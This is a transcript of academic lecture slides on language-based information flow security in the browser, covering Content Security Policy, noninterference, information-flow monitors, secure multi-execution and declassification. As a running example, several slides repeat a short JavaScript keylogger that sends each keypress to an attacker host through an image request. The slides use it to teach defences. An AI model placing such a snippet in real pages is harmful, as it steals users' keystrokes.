Language-based Information Flow Security Enforcements Information Flow Security Enforcements ......

Language-based Information Flow Security Enforcements

Tamara Rezk INRIA !!

Joint work with Nataliia Bielova, Raimil Cruz,

Willem De Groef, Dominique Devriese, José Fragoso-Santos, Deepak Garg, Thomas Jensen,

Frank Piessens, Alan Schmitt, Bernard Serpette, Francis Somé, Vineet Rajani, Éric Tanter

!GT Verif

!30/05/17

!

!1

Information Flow Problem

var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; } !

secret input

public output

!2



How can attacker code execute in my browser?

• If user goes to attacker’s server • Fishing • …

!3

XSS vulnerability

!4


!5

XSS vulnerability


!6

XSS vulnerability


!7

XSS vulnerability


!8


!9

AdvertisementHow can attacker code execute in my browser?




• If user goes to attacker’s server • Fishing • XSS • If user goes anywhere with third-party code

!10



How can we protect from information leaks?

!11



How can we protect from this kind of leaks?

!12

• Content Security Policy • Same Origin Policy • Capability systems • Information Flow Enforcement




!13

• Content Security Policy • Same Origin Policy • Capability systems • Information Flow Enforcement[CSF’16: On access control, capabilities, their equivalence, and

confused deputy attacks]




!14

• Content Security Policy • Same Origin Policy • Capability systems • Information Flow Enforcement

Content Security Policy (CSP)

!15

• Declare trusted contents to the browser • Browser blocks unknown contents !Guarantee: unknown code will not steal user data

http://trusted.com

!script-src ‘self’ third.com

CSP policy

<script> var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; } <script> !!!


!16

• Declare trusted contents to the browser • Browser blocks unknown contents !Guarantee: unknown code will not steal user data

http://trusted.com


CSP policy

! var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }

!

<iframe src = othertrustedpage.html></iframe>

?


!17

http://trusted.com


CSP policy

<iframe src = othertrustedpage.html></iframe>

Inconsistencies with the Same Origin Policy [WWW’17 On the Content Security Policy Violations

due to the Same-Origin Policy ] !

analyzed 10K sites: 94% with CSP vulnerable including sites as amazon, imdb, twitter, etc


!

Same Origin Policy

!18

http://trusted.com

<iframe src = http://attacker.com></iframe>

- it allows programmer to isolate content inside a frame !- for the example below: leaks will still flow to attacker server but only for keys pressed inside the frame


!

http://attacker.com

More fine grain enforcement: Information Flow Security


secret input

public output

!19

Information Flow Security

secret

public

!20

Security Lattice


!21

P

P

= =

Security Property: Noninterference


!22

=

Security Property: Noninterference?

var url = 'http://attacker.com/?='; onkeypress = function(e) { var leak = e.charCode; new Image().src = url + leak; }



!23

Security Property: Noninterference?




!24

=



User presses key 100


http://attacker.com/?=100


This program does not comply with Noninterference


!25

How to enforce it?

Security Property: NoninterferenceNot a trace property, also in a computational flavor [POPL’08 Cryptographically Sound Implementations

for Typed Information-Flow Security]


!26

How to enforce it?

- Static Analysis [JCS’96 Volpano&Smith] [CSFW’04 Secure Information Flow by Self Composition] Not appropriate for the web context

!- Dynamic or Hybrid Enforcements [SEC’14 An inlined monitor for JavaScript] [TGC’14 Modular Extensions of Web Monitors] [TGC’15 Hybrid Typing for JavaScript]

Security Property: NoninterferenceNot a trace property, also in a computational flavor [POPL’08 Cryptographically Sound Implementations

for Typed Information-Flow Security]


!27


How to enforce it?


!- Dynamic or Hybrid Enforcements [SEC’14 An inlined monitor for JavaScript] [TGC’14 Modular Extension of Web Monitors] [TGC’15 Hybrid Typing for JavaScript]


!28


How to enforce it?




!29


How to enforce it?



Soundness Transparency

TSNITANITINI

Monitors

True False

A taxonomy of information flow monitors

!30

[POST’16]

A taxonomy of information flow monitors [POST’16]

! • NSU (no sensitive upgrade) [Zdancewic ’02] !!

• PU (permissive upgrade) [Austin and Flanagan ’10] !!• HM (hybrid monitor) [LeGuernic et al ’06] !!• MF (multiple facets) [Austin and Flanagan ’12]

!• SME (secure multi execution) [Devriese and Piessens ’10]

We study 5 classes of monitors:

!31

1

SME

Taxonomy: SoundnessBefore [POST’16] work, we knew:

[Devriese and Piessens SP'10]

!32

12

SMEHM MF

3

NSU PU

Taxonomy: SoundnessWith [POST’16] work, we learn:

!33

SME

MF

HM

PU

NSU

NSU PU HM MF SME

True Transparency

Taxonomy: Transparency

SME

MF

HM

PU

NSU

NSU PU HM MF SME

False Transparency

Previous to [POST’16] work: HM and NSU/PU incomparable [Hedin Bello Sabelfeld et al. 15]

!34

Spot the difference: MF and SME [ESORICS’16]

! !• MF (multiple facets) [Austin and Flanagan ’12]

!• SME (secure multi execution) [Devriese and Piessens ’10]

!35

[POST’16]

[CSF’15]

“Faceted evaluation is a technique for simulating secure multi-execution with a single process”

“Austin and Flanagan [6] show how secure multi-execution can be optimized by executing a single program on faceted values”

Secure Multi Execution (SME):

!36

LOW PROCESS!

HIGH PROCESS!

Basedonpresenta,onofT.Aus,n@POPL’12

secret input

public inputs

secret outputs

public outputs

default input

[Devriese and Piessens Oakland’10]


secret input

public output

!37

Secure Multi Execution (SME): !

Execution Low Process

default input: example key 100

[Devriese and Piessens Oakland’10]


!38

=







This program does not comply with Noninterference

Secure Multi Execution

!39

=



presses key 102




This program does comply with Noninterference

default input: key 100default input: key 100default input: key 100

default input: key 100


Secure Multi Execution (SME)

!40

var d=0, url = ‘http://analytics.com/?='; onkeypress = function(e) { if (e.charCode = 101) d=1; } onunload = function() { $.ajax(url+d); }

Is Noninterference or SME enough in practice?


!41


Is Noninterference or SME enough in practice?

Google analytics library used in 86% of top 10K sites https://webstats.inria.fr/

https://webstats.inria.fr/

Declassification [Li&Zdancewic POPL’05 - Relaxed Noninterference]

!42

top secret

public

secret

={!":#$%&'(. ")'*+,&'+*"}

={!":#$%&'(. !):#$%&'(. "==)}

={!":#$%&'(. "}

secret

public

Each point in the lattice is a downgrading policy


!43

P

P

= =

Security Property: Noninterference


!44

P

P

=

Security Property: Declassification

secret = function f

v1=f v2 iff f(v1) = f(v2)

=f

Secure Multi Execution with Declassification

!45

inputs

secret outputs

public outputs

[CSF’14 Stateful Declassification Policies for Event-Driven Programs]

Declassifier D generalizes information flow labels as in [Li&Zdancewic POPL’05]

High Process

Low ProcessD+release channel


!46


with Declassification


!47

var d=0, url = ‘http://analytics.com/?='; onkeypress = function(e) { if (e.charCode = 101) d=1; } onunload = function() { r = declassify(d); $.ajax(url+r); }

with Declassification

D (s,i) = if i= KeyPress 101 and not s

then (True, Release 1, KeyPress 100) ! else (s, Unchanged, KeyPress 100)

Password Checker does not comply with Noninterference

!48

var password; var input; var output; !output = (password == input)

secret

public

secret

public

var password; var input; var output; !output = (password == input)

Declassification [Li&Zdancewic POPL’05]

!49

secret

public

publicmedium

={!":#$%&'(. ")'*+,&'+*"}

={!":#$%&'(. !):#$%&'(. "==)}

={!":#$%&'(. "}

medium ={!":#$%&'(. !):#$%&'(. "==)}

!50

={!":#$%&'(. !):#$%&'(. "==)}

H

L

P⋮

⋮

={!":#$%&'(. "}

={!":#$%&'(. "*'+,-&',+"}String

={}

={==(y:String):String}

={…fullStringinterface…}

Welostthecomputa.onspecifica.on.Wejusttalkabout

theinterface.Problems?

String≡String↑String

Declassification An Object Oriented perspective

[ECOOP’17, Type Abstraction for Noninterference]

We use object interfaces as security

levels

Summary

!51

Language-based Information Flow Security !

!- provides a fine grain mechanism to specify and enforce propagation of information - strict property: noninterference (TINI, TSNI, computational…) - relaxed properties: declassification (another zoo, RNI) !Enforcements: !!Dynamic Mechanisms - State of the Art: Secure Multi Execution and Multiple Facets !!Purely Static - Not convenient for web applications - Promising direction in using parametricity properties for soundly type declassification policies

Language-based Information Flow Security Enforcements Information Flow Security Enforcements ......

Documents

Transcript of Language-based Information Flow Security Enforcements Information Flow Security Enforcements ......